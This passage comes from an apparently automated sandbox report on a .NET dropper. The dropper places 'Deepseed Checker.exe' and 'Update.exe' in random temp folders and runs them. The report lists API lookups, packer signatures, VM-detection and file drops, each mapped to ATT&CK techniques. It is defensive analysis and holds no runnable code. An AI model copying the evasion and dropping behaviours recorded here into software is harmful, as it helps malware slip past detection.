\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter CryptReleaseContext (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter RpcBindingFree (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter CreateActCtxW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter AddRefActCtx (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter ReleaseActCtx (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter ActivateActCtx (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter DeactivateActCtx (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetCurrentActCtx (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter QueryActCtxW (UID: 00000000-00003276)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter AddDllDirectory (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCallback (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCleanupCallback (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter SetShellShimInstance (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter OnShimDllMainCalled (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter _CorExeMain_RetAddr (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter _CorExeMain (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter UrlIsW (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSizeW (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoW (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter VerQueryValueW (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter SetRuntimeInfo (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter GetProcessWindowStation (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter GetUserObjectInformationW (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream_RetAddr (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter GetNumaHighestNodeNumber (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter GetSystemWindowsDirectoryW (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter InitializeAcl (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter AddAccessAllowedAce (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter AddSIDToBoundaryDescriptor (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter CreateBoundaryDescriptorW (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter CreatePrivateNamespaceW (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter OpenPrivateNamespaceW (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter DeleteBoundaryDescriptor (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter WerRegisterRuntimeExceptionModule (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter RaiseException (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter SetSystemFileCacheSize (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter NtSetSystemInformation (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter PrivIsDllSynchronizationHeld (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter GetProcessMemoryInfo (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter GetEnabledXStateFeatures (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter sxsJitStartup (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter jitStartup (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter getJit (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter LocaleNameToLCID (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter GetUserDefaultLocaleName (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter LCIDToLocaleName (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter GetUserPreferredUILanguages (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyEx (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter GetFullPathNameW (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter IsAppThemed (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter IsAppThemedW (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter CreateActCtx (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter CreateActCtxA (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter RegisterWindowMessage (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter RegisterWindowMessageW (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter DllGetClassObject (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextA (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter CryptCreateHash (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter CryptGetHashParam (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter CryptHashData (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter CryptDestroyHash (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter CryptReleaseContext (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextW (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter CryptImportKey (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter CryptExportKey (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter CryptDestroyKey (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter SetThreadErrorMode (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesEx (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExW (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter CreateFile (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter GetFileType (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap_RetAddr (UID: 00000000-00002512)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\" was detected as \".NET\" and name: \"Library\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\" was detected as \"VB.NET\" and name: \"Compiler\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Deepseed Checker.exe\" was detected as \".NET\" and name: \"Library\"\n \"Deepseed Checker.exe\" was detected as \"VB.NET\" and name: \"Compiler\"\n \"Deepseed Checker.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Update.exe\" was detected as \".NET\" and name: \"Library\"\n \"Update.exe\" was detected as \"VB.NET\" and name: \"Compiler\"\n \"Update.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-124", "relevance": 3, "name": "PE file has a big virtual size section", "description": "Virtual size of \".text\" is \"0x9a9840\" greater than 0x100000\n Virtual size of \".text\" is \"0x1ffac0\" greater than 0x100000\n Virtual size of \".rdata\" is \"0x3a8c40\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"0d000e00844b0f6d@iphlpapi.dll\"\n \"0f001000dc4b0f6d@iphlpapi.dll\"\n \"0c000d00244c0f6d@iphlpapi.dll\"\n \"140015006c4c0f6d@iphlpapi.dll\"\n \"0c000d00e04c0f6d@iphlpapi.dll\"\n \"15001600c03e0f6d@ADVAPI32.dll\"\n \"0e000f00703f0f6d@ADVAPI32.dll\"\n \"0e000f00cc3f0f6d@ADVAPI32.dll\"\n \"11001200b4470f6d@ADVAPI32.dll\"\n \"1100120048480f6d@ADVAPI32.dll\"\n \"120013008c480f6d@ADVAPI32.dll\"\n \"12001300e4480f6d@ADVAPI32.dll\"\n \"14001500386e0f6d@ADVAPI32.dll\"\n \"14001500506e0f6d@ADVAPI32.dll\"\n \"14001500686e0f6d@ADVAPI32.dll\"\n \"17001800806e0f6d@ADVAPI32.dll\"\n \"0d000e00986e0f6d@ADVAPI32.dll\"\n \"11001200a86e0f6d@ADVAPI32.dll\"\n \"11001200bc6e0f6d@ADVAPI32.dll\"\n \"0d000e0034490f6d@shell32.dll\"\n \"0d000e00b0490f6d@shell32.dll\"\n \"0f001000fc6f0f6d@ADVAPI32.dll\"\n \"140015003c700f6d@ADVAPI32.dll\"\n \"1400150054700f6d@ADVAPI32.dll\"\n \"0c000d009c700f6d@ADVAPI32.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\" has flags like IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n \"Deepseed Checker.exe\" has flags like IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA\n \"Update.exe\" has flags like IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-187", "relevance": 1, "name": ".rdata section contains high entropy", "description": "\"Update.exe\" has section name .rdata with entropy \"7.97277997928\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-79", "relevance": 1, "name": "Contains ability to dynamically determine API calls", "description": "Found GetProcAddress() and LoadLibraryA() in an import section (Source: Update.exe)", "origin": "Static Parser", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"CreateDirectoryW\" with parameter %TEMP%\\hAifIHNdlq (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"CreateDirectoryW\" with parameter %TEMP%\\QknqBASLBEmK (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003276)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\hAifIHNdlq\\Deepseed Checker.exe\"\" - (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\QknqBASLBEmK\\Update.exe\"\" - (UID: 00000000-00003276)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\" has an executable section named \".text\"\n \"Deepseed Checker.exe\" has an executable section named \".text\"\n \"Update.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".text\" is \"0x9a9a00\" greater than 0x100000\n Raw size of \".text\" is \"0x1ffc00\" greater than 0x100000\n Raw size of \".rdata\" is \"0x3a8e00\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-155", "relevance": 1, "name": "Contains ability to set file attributes (Dotnet)", "description": "Observed Namespace \"System.IO.File\" and MemberReference \"SetAttributes\" in \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\"", "origin": "Static Parser", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"Deepseed Checker.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"Update.exe\" has an writable section named \".data\"\n \"Update.exe\" has an writable section named \".eh_fram\"\n \"Update.exe\" has an writable section named \".bss\"\n \"Update.exe\" has an writable section named \".idata\"\n \"Update.exe\" has an writable section named \".CRT\"\n \"Update.exe\" has an writable section named \".tls\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "binary-26", "type": 8, "relevance": 5, "name": "The input sample possibly contains the RDTSCP instruction", "description": "Found VM detection artifact \"RDTSCP trick\" in \"sample.bin\" (Offset: 866076)", "origin": "Binary File", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Pattern Matching", "identifier": "yara-140", "type": 13, "relevance": 2, "name": "YARA signature match – Embedded PE executable", "description": "YARA signature matched on embedded PE in file \"sample.bin\"", "origin": "YARA Signature", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\" was detected as \"Microsoft visual C# v7.0 / Basic .NET\"\n \"Deepseed Checker.exe\" was detected as \"Morphine v1.2 (DLL)\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"Deepseed Checker.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"Deepseed Checker.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%TEMP%\\hAifIHNdlq\\Deepseed Checker.exe]- [targetUID: 00000000-00002512]\n \"Update.exe\" has type \"PE32+ executable (GUI) x86-64 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\QknqBASLBEmK\\Update.exe]- [targetUID: 00000000-00003276]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-2.dll\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-0.dll\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\VCRUNTIME140_CLR0400.dll\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ucrtbase_clr0400.dll\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-quirks-l1-1-0.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"Deepseed Checker.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" reads file \"c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll.aux\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" reads file 